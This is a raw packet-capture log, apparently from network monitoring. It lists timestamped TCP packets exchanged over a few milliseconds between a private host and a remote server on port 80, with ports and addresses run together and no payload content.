                Jan 15, 2022 01:14:07.180558920 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180583000 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180598974 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180604935 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180630922 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180649996 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180655003 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180680037 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180697918 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180706024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180730104 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180740118 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180752993 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180777073 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180787086 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180797100 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180823088 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180829048 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180846930 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180869102 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180879116 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180891991 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180915117 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180929899 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180937052 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180963039 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180969954 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180984020 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181006908 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181019068 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181030989 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181055069 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181066990 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181077957 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181102037 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181108952 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181123972 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181148052 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181159019 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181169033 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181194067 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181200981 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181217909 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181240082 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181250095 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181265116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181288004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181292057 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181313038 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181334972 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181356907 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181356907 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181382895 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181394100 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181408882 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181442022 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181442976 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181468964 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181493044 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181504965 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181516886 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181540012 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181550980 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181560993 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181583881 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181593895 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181607962 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181629896 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181639910 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181653976 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181679964 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181684971 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181701899 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181724072 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181742907 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181746006 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181768894 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181777954 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181794882 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181816101 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181838989 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181840897 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181885004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181905985 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181916952 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181929111 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181947947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.181952953 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181977987 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.181994915 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182001114 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182025909 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182039976 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182049990 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182073116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182082891 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182097912 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182120085 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182132959 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182146072 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182168007 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182174921 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182189941 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182212114 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182224035 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182234049 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182257891 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182270050 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182281017 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182302952 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182316065 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182326078 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182349920 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182357073 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182372093 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182394028 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182401896 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182418108 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182440996 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182446957 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182462931 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182486057 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182495117 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182512045 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182533979 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182543993 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182554960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182579994 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182588100 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182601929 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182625055 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182636023 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182646990 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182672024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182678938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182693958 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182718039 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182729959 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182739019 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182765007 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182775974 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.182785988 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.182817936 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.236459017 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281048059 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281142950 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281183958 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281205893 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281207085 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281265020 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281279087 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281318903 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281327009 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281373978 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281378984 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281428099 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281469107 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281486988 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281491041 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281543016 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281555891 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281599998 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281600952 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281652927 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281656981 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281708002 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281723022 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281759977 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281764984 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281810045 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281817913 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281898975 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.281934023 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281996965 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.281999111 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282057047 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282063961 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282114029 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282154083 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282161951 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282172918 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282223940 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282243013 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282275915 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282293081 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282331944 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282351017 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282387972 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282409906 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282438993 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282463074 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282491922 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282500982 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282545090 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282552958 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282598972 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282603979 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282650948 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282660007 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282706022 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282721043 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282764912 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282774925 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282820940 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282860994 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282872915 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282892942 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282927990 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.282931089 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.282979965 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283024073 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283032894 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283036947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283085108 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283098936 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283138037 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283148050 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283191919 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283207893 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283245087 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283297062 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283301115 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283349991 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283353090 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283401966 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283412933 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283457041 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283468962 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283510923 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283529043 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283565044 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283566952 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283620119 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283621073 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283680916 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283690929 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283735037 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283741951 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283787966 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283828974 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283838034 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283848047 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283890009 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283905029 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283942938 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.283957958 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.283993959 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284008980 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284045935 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284063101 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284099102 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284113884 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284151077 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284168005 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284204960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284213066 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284260035 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284275055 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284317017 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284324884 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284369946 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284385920 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284421921 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284426928 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284473896 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284477949 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284526110 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284531116 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284578085 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284581900 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284631014 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284636021 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284681082 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284687996 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284734011 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284737110 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284785032 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284789085 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284836054 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284842014 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284887075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284890890 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284938097 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.284954071 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.284991980 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285002947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285048008 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285067081 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285099030 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285116911 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285151958 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285156965 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285203934 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285208941 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285254955 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285258055 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285307884 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.285321951 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.285368919 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286601067 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286655903 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286668062 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286712885 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286729097 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286766052 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286782980 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286820889 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286830902 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286875010 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286880970 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286931992 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286942005 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.286988020 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.286989927 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287044048 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287045002 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287094116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287100077 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287147999 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287149906 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287200928 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287204027 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287251949 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287256002 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287305117 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287307024 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287358999 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287360907 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287410975 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287412882 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287466049 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287466049 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287518024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287519932 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287570953 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287570953 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287625074 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287626028 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287676096 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287682056 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287729025 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287734985 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287781954 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287789106 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287836075 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287836075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287889957 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287889957 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287940979 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287949085 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.287992954 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.287997007 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288064003 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288072109 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288114071 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288117886 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288167000 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288167000 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288218975 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288223028 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288269043 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288273096 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288321018 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288325071 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288372993 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288373947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288424969 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288425922 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288477898 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288491964 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288527966 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288536072 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288580894 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288582087 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288633108 CET804976074.201.28.62192.168.2.4
